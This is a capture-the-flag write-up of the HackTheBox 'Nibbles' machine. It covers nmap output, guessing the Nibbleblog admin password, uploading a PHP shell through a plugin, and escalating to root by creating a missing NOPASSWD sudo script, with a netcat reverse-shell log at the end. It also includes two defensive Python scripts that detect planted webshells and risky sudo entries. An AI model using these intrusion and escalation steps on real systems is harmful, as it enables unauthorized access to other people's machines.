```
┌──(kali㉿kali)-[~/HackTheBox/Nibble/10.10.10.75/nmap]
└─$ nmapenumertor 10.10.10.75
Basic
Nmap 7.91 scan initiated Tue Feb 9 03:27:22 2021 as: nmap -Pn -sCV -p22,80 -oN nmap/Basic_10.10.10.75.nmap 10.10.10.75
Nmap scan report for 10.10.10.75
Host is up (0.20s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done at Tue Feb 9 03:27:36 2021 -- 1 IP address (1 host up) scanned in 13.94 seconds
```
The box has two services: OpenSSH on port 22 and an Apache server on port 80. The Apache version shown here is vulnerable to the Shellshock vulnerability. On checking http://10.10.10.75/cgi-bin/, it shows directory not found.
Time to move on.
On checking the page source, I got this info:
Let's check out the /nibbleblog directory.
Time to get more info on Nibbles. Doing a search on Nibble Blog landed me on a page which describes how one can upload a shell to Nibbleblog version 4.0.3.
As per the blog, if I get admin access then I can upload a php shell.
Checking if admin.php exists.
This is where I got stuck for a while. Trying to log in with some default passwords got me blacklisted; after a couple of minutes the page was reachable again, but brute forcing won't work here. I need to guess!
Tried admin:nibbles, which worked and got me admin access. Phew!
Moving to the plugin directory, opening the shell and getting the user flag.
We don't have root access yet, so let's check whether the user can run any binaries with sudo.
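From the defender's side, the thing to catch here is a PHP file appearing somewhere the application only ever stores uploaded content. The following script is an added example written for this writeup, not code from the page or from the Nibbleblog project: it compares a listing of the web root against an allowlist of the script files the install legitimately ships and flags any executable-looking file outside it, including double-extension names such as `avatar.php.jpg`. The directory names in the sample listing and the allowlist are constructed placeholders (only admin.php is taken from the page), and the extension set is an assumption.

```python
import os
from typing import Iterable, List, Set

# Extensions the PHP handler would execute. .phtml/.phar are commonly mapped
# alongside .php; treat the set as an assumption and extend it for your server.
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}

# Constructed allowlist standing in for the script files a clean install ships.
# admin.php is mentioned on the page; the other paths are placeholders.
KNOWN_SCRIPTS: Set[str] = {"index.php", "admin.php", "admin/templates/index.php"}

# Constructed listing of a web root after an upload-based webshell was planted.
# The plugin/upload directory names are hypothetical, not Nibbleblog's real layout.
SAMPLE_LISTING = [
    "index.php",
    "admin.php",
    "admin/templates/index.php",
    "content/public/upload/photo.jpg",
    "content/private/plugins/example_plugin/image.php",
    "content/public/upload/avatar.php.jpg",
]


def is_script_name(name: str) -> bool:
    """True if any extension segment is executable, so 'avatar.php.jpg' is
    caught as well (an Apache AddHandler for .php can execute such names)."""
    segments = name.lower().split(".")[1:]
    return any(seg in SCRIPT_EXTS for seg in segments)


def find_unexpected_scripts(rel_paths: Iterable[str], baseline: Set[str]) -> List[str]:
    """Return script-like files that are not part of the install allowlist,
    sorted so repeated runs diff cleanly."""
    findings = []
    for p in rel_paths:
        p = p.replace("\\", "/")
        if is_script_name(os.path.basename(p)) and p not in baseline:
            findings.append(p)
    return sorted(findings)


def walk_webroot(root: str) -> List[str]:
    """Relative paths of every file below root, for feeding find_unexpected_scripts."""
    out = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            rel = os.path.relpath(os.path.join(dirpath, f), root)
            out.append(rel.replace(os.sep, "/"))
    return out


if __name__ == "__main__":
    # Offline demo on the constructed listing; on a real host use
    # walk_webroot("/var/www/html") and a baseline generated from a clean install.
    for hit in find_unexpected_scripts(SAMPLE_LISTING, KNOWN_SCRIPTS):
        print("unexpected script file:", hit)
```

Run it from cron against the web root with a baseline captured right after installation; the two constructed hits above are exactly the artefacts the upload described in this section would leave behind, while the real application code is silent.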
```
nibbler@Nibbles :/home/nibbler# sudo -l
sudo: unable to resolve host Nibbles: Connection timed out
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
```
Nice! The directory personal/stuff is not present. Let's create it and add the file monitor.sh. We can use this to spawn a reverse shell and get the root flag.
```
┌──(kali㉿kali)-[~/bi0s]
└─$ sudo nc -nvlp 800
[sudo] password for kali:
listening on [any] 800 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.75] 37638
bash: cannot set terminal process group (1328): Inappropriate ioctl for device
bash: no job control in this shell
root@Nibbles:/home/nibbler/personal/stuff# whoami
whoami
root
root@Nibbles:/home/nibbler/personal/stuff# cd /home/
cd /home/
root@Nibbles:/home# ls
ls
nibbler
root@Nibbles:/home# cd /
cd /
root@Nibbles:/# cd /root/
cd /root/
root@Nibbles:~# ls
ls
root.txt
root@Nibbles:~# cat root.txt
cat root.txt
```
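The root step works because the sudoers entry points at a script that does not exist, inside the user's own home directory, with NOPASSWD on top. That combination is easy to audit for. The script below is an added example written for this writeup (not from the page or any tool it uses): it parses `sudo -l` output, then flags entries whose target is missing or sits in a user-writable tree, raising the severity when NOPASSWD applies. The `sudo -l` sample is constructed, with the first entry mirroring the one shown above and the other two made up to exercise the checks; the list of user-writable prefixes is an assumption.

```python
import os
import re
from typing import Callable, Dict, List

# Constructed sample of `sudo -l` output. The first entry mirrors the writeup;
# the other two are made up so the checks have something to pass and fail.
SAMPLE_SUDO_L = """\
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
    (root) /usr/bin/systemctl restart apache2
    (root) NOPASSWD: /opt/backup/run_backup.sh
"""

# One privilege line: "(runas) [TAG: ...] command [args]"
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*?)\s*$")

# Trees an unprivileged user can normally write to (assumption for the example).
USER_WRITABLE_PREFIXES = ("/home/", "/tmp/", "/var/tmp/", "/dev/shm/")


def parse_sudo_l(output: str) -> List[Dict]:
    """Extract the command entries that follow the 'User X may run ...' header."""
    entries, in_commands = [], False
    for line in output.splitlines():
        if re.match(r"^User \S+ may run the following commands", line):
            in_commands = True
            continue
        if not in_commands or not line.strip():
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        cmd = m.group("cmd")
        entries.append({
            "runas": m.group("runas").strip(),
            "tags": [t.rstrip(":") for t in m.group("tags").split()],
            "command": cmd,
            "path": cmd.split()[0],
        })
    return entries


def audit_entries(entries: List[Dict],
                  exists: Callable[[str], bool] = os.path.exists) -> List[Dict]:
    """Flag entries whose target the invoking user could control: the file is
    missing (so the user may be able to create it) or it lives in a
    user-writable tree. NOPASSWD raises severity because no password prompt
    stands between the user and root."""
    findings = []
    for e in entries:
        path, reasons = e["path"], []
        if not path.startswith("/"):
            reasons.append("relative path")
        elif not exists(path):
            reasons.append("target missing")
        if path.startswith(USER_WRITABLE_PREFIXES):
            reasons.append("user-writable tree")
        if not reasons:
            continue
        severity = "high" if "NOPASSWD" in e["tags"] else "medium"
        findings.append({"path": path, "runas": e["runas"],
                         "severity": severity, "reasons": reasons})
    return findings


if __name__ == "__main__":
    # Offline demo: pretend only /usr and /opt paths exist. On a real host drop
    # the exists= argument and feed it `sudo -l -U <user>` output instead.
    fake_exists = lambda p: p.startswith(("/usr/", "/opt/"))
    for f in audit_entries(parse_sudo_l(SAMPLE_SUDO_L), exists=fake_exists):
        print(f"[{f['severity']}] {f['path']} as {f['runas']}: {', '.join(f['reasons'])}")
```

The fix the audit points at is the usual one: keep sudo targets under a root-owned path such as /usr/local/sbin, make sure the file actually exists and is not writable by the invoking user, and reserve NOPASSWD for commands whose arguments are fully fixed.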